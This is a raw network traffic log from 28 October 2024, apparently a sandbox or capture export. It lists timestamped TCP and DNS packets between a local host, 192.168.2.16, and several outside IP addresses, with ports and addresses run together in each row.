                                                                                                                                                              Oct 28, 2024 19:45:32.873047113 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.874522924 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.886861086 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.887096882 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.887336016 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.896979094 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.897962093 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:45:32.928981066 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123344898 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123402119 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123421907 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123440027 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123478889 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123495102 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123497009 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123519897 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123523951 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123538017 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123569965 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123603106 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.141108036 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141164064 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141191959 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.141222000 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141251087 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.183991909 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241101027 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241132975 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241178036 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241211891 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241246939 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241265059 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241319895 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.247980118 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                              Oct 28, 2024 19:45:33.257421970 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257466078 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257540941 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.257556915 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257586002 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.257635117 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258225918 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258292913 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258306980 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258393049 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258447886 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258466005 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258501053 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258501053 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258543968 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.285149097 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290477037 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.290541887 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290586948 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290599108 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290666103 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290918112 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.290968895 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.291033983 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.291253090 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.291282892 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.295948029 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.295994043 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.338958025 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.769934893 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.770092964 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:34.139941931 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.140263081 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.140315056 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.141834021 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.141927004 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.143201113 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.143302917 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.144103050 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.144119978 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.190013885 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.383424997 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.383455992 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.383528948 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:46:17.345915079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.346632004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.346683979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.346692085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.389168978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.455271006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455672026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455708981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455746889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.456440926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456521988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.456676006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456707001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456739902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456763983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.457629919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.457667112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.457684040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.458651066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.458684921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.458717108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.459665060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.459700108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.459721088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.460664988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460701942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460719109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.460735083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460787058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.461668015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.461700916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.461752892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.462727070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462760925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462793112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462820053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.463768959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.463803053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.463824987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.464478016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.464512110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.464528084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.465256929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.465310097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.465312958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466070890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466105938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466125965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466139078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466197968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.466926098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.466965914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467020035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.467668056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467701912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.467751980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.468458891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.468492985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.468540907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.469280958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469315052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469347954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.469368935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.470058918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470094919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470114946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.470869064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470910072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.470923901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.471663952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.471698999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.471719027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.472459078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.472492933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.472508907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.473206997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473257065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473273993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.473287106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.473335981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.573851109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574069977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574105024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574141026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.574820042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574852943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.574881077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.575613976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.575648069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.575678110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.576445103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576493025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576500893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.576524973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.576580048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.577203989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.577239037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.577291965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.578001976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578037977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578069925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578100920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.578877926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578913927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.578939915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.579621077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579653978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579685926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.579690933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.579737902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.580416918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.580451012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.580503941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.581222057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581258059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581332922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.581892014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581927061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581975937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.581975937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.582854033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582889080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.582917929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.582921028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701649904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701663017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.701684952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.701726913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.702438116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702471972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702506065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702519894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.702539921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.702588081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.703270912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703305006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703352928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703358889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.703387976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703422070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.703432083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704103947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704138994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704152107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704173088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704205990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704221010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704916954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704952002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.704968929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.704986095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705018997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705024004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705051899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705096006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705760002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705795050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705827951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705838919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.705862045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.705909014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.706593037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706626892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706660032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706676960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.706693888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706727028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.706742048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707425117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707459927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707478046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707494020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.707535028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.707526922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708065987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.708246946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708281994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708298922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.708314896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708348989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.708367109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709019899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709054947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709072113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709086895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709120989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709131956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709155083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709188938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.709198952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.709970951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710006952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710020065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710041046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710073948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710104942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710107088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710141897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710165024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710916996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710951090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.710961103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.710984945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.711038113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.742559910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.877283096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.882855892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.899132013 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:17.899159908 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039475918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039623976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039720058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.039752960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039788008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039823055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.039841890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040219069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040250063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040283918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040296078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040317059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040335894 CET4972680192.168.2.16166.1.160.211
